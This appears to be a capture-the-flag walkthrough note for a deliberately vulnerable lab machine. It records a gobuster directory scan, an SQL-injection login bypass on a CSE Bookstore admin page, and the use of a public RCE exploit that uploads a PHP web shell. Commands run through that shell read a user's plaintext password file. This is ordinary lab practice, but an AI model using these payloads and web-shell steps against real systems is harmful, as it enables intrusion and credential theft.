2 :80

http://192.168.129.111/
Apache 2 Splash Page

$ gobuster dir -u http://192.168.129.111 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
2021/08/12 10:53:33 Starting gobuster in directory enumeration mode
===============================================================
/profile.php          (Status: 302) [Size: 7247] [--> http://192.168.129.111/index.php]
/index.php            (Status: 200) [Size: 3468]
/index.html           (Status: 200) [Size: 10918]
/header.php           (Status: 200) [Size: 1666]
/admin                (Status: 301) [Size: 318] [--> http://192.168.129.111/admin/]
/store                (Status: 301) [Size: 318] [--> http://192.168.129.111/store/]
/registration.php     (Status: 200) [Size: 9409]
/logout.php           (Status: 200) [Size: 75]
/robots.txt           (Status: 200) [Size: 14]
/dashboard.php        (Status: 302) [Size: 10272] [--> http://192.168.129.111/index.php]
/secret               (Status: 301) [Size: 319] [--> http://192.168.129.111/secret/]
/leftbar.php          (Status: 200) [Size: 1837]
/forgot-password.php  (Status: 200) [Size: 2763]
/gym                  (Status: 301) [Size: 316] [--> http://192.168.129.111/gym/]
/hitcounter.txt       (Status: 200) [Size: 1]

http://192.168.129.111/index.php
CRM Login Page

http://192.168.129.111/admin/
Admin Login to CRM Admin

http://192.168.129.111/store/
Online CSE Bookstore

http://192.168.129.111/store/admin.php
Admin Login 2017

CSE Bookstore has expoits
https://www.exploit-db.com/exploits/48960 - Auth Bypass
https://www.exploit-db.com/exploits/47887 - Unauth RCE

#  Auth Bypass works
# login to http://192.168.129.111/store/admin.php
using admin:%' or '1'='1 

# had to modify script for RCE to allow opening shell
# pass url to directory - not login page

 python 47887.py http://192.168.129.111/store/
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://192.168.129.111/store/bootstrap/img/9JtRhAG8E9.php
> Example command usage: http://192.168.129.111/store/bootstrap/img/ooNLYWSSBz.php?cmd=whoami
RCE $
# shell breaks due to string error but file is uploaded

http://192.168.129.111/store/bootstrap/img/9JtRhAG8E9.php?cmd=whoami;id;hostname
www-data uid=33(www-data) gid=33(www-data) groups=33(www-data) funbox3 funbox3

# cant seem to get proper rev shell time to enumerate

RCE $ ls -la /home
total 12
drwxr-xr-x  3 root root 4096 Jul 30  2020 .
drwxr-xr-x 20 root root 4096 Oct 30  2020 ..
drwxr-xr-x  3 tony tony 4096 Aug 12 19:11 tony

RCE $ ls -la /home/tony
total 28
drwxr-xr-x 3 tony tony 4096 Aug 12 19:11 .
drwxr-xr-x 3 root root 4096 Jul 30  2020 ..
-rw------- 1 tony tony    0 Oct 30  2020 .bash_history
-rw-r--r-- 1 tony tony  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 tony tony 3771 Feb 25  2020 .bashrc
drwx------ 2 tony tony 4096 Aug 12 19:11 .cache
-rw-r--r-- 1 tony tony  807 Feb 25  2020 .profile
-rw-rw-r-- 1 tony tony   70 Jul 31  2020 password.txt

RCE $ cat /home/tony/password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin

Last updated